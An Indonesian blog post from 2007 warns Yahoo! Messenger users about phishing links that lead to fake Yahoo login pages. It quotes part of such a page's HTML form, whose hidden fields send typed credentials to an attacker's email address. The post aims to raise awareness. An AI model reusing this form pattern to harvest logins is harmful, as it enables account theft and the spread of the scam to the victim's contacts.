Tuesday, May 29, 2007

Tipuan di yahoo ! messenger

Cara Kerja Pencuri ID Yahoo!



Saat anda chating dengaan YM tiba-tiba ada message berformat URL, kadang dari teman dekat kita yang sudah kita add ID nya di friends list kita , biasanya berformat http://www.geocities.com/xxxxx..., biasanya menawarkan hal-hal emosional spt, sex, uang, dan sejenisnya..., dan setelah di klik biasanya ada tampilan yang mirip sekali dengan login yahoo atau yahoo mail, dan kita tergoda untuk login dengan ID yahoo kita , dan bila kita login maka saat itulah ID login kita tertangkap oleh Oknum penyusup itu.
Coba View halaman itu source HTML nya --> klik-kanan--> View page source, dan dalam kumpulan kode HTML itu cari bagian “form", maka akan kita temukan kurang lebih seperti contoh kode di bawah ini,

-----------------------
FORM METHOD=”POST” ACTION=…. ENCTYPE=”x-www-form-urlencoded”
INPUT TYPE=”hidden” NAME=”Mail_From” VALUE=”Yahoo”
INPUT TYPE=”hidden” NAME=”Mail_To” VALUE=”love_03031@yahoo.com”
INPUT TYPE=”hidden” NAME=”Mail_Subject” VALUE=”Yahoo id”
-----------------------
Nah, seperti kita lihat ID login yang kita ketikan akan di kirimkan ke email love_03031@yahoo.com, dan nantinya dengan data ID kita itu si pelaku akan login dengan ID YM kita, dan dia bisa mengirimkan message berformat URL serupa ke kawan-kawan kita yang ada di friends list , dan kawan kita akan menganggap pengirim message itu adalah kita sehingga ia tidak ragu utk meng-klik, dan kejadian itu akan berulang terus/looping.
Dari logika kode itu artinya bisa di kembangkan untuk banyak variasi tipuan dan bukan hanya untuk mencuri ID yahoo, Contoh yang mirip dengan pola ini juga terjadi di dunia friendster, yaitu dengan masuk ke testimonial target dan memberikan sapaan yang menarik/merangsang agar target meng-approve lalu login dengan ID dan passwordnya, contoh trik lainya yaitu dengan menggunakan link download yaitu kita di tawarkan suatu program yang menarik untuk di download lalu bila kita mendownload program itu dan kita klik/eksekusi file nya saat itulah secara otomatis data ID kita terkirim ke email pelaku , .......saya tidak membahas contoh-contoh trik ini, karena tujuan saya bukan meng-informasikan cara Hacking, tapi memberikan gambaran bagi yang belum tau supaya berhati-hati tidak asal klik ..,karena bila kita menyimpan informasi sensitif di email kita ,kan tidak nyaman juga kalau di obok-obok orang lain.
Dari fenomena ini saya berfikir untuk apa orang-orang melakukan itu..!, tujuanya apa..?, kalau saya sendiri di inbox saya dari beberapa email ada puluhan ribu yang belum terbaca apalagi suruh masuk dan baca-baca email orang...mending email nya selebriti.......Mungkin pada awalnya ide dan pola itu di buat oleh seseorang dengan tujuan tertentu dan lalu menyebar dan berkembang kemana-mana, atau mungkin itu kerjaan anak-anak yang lagi latihan jadi hacker barangkali.....or mungkin pelaku ingin memata-matai pacarnya karena takut selingkuh barangakali juga....entahlah...

Semoga ada gunanya..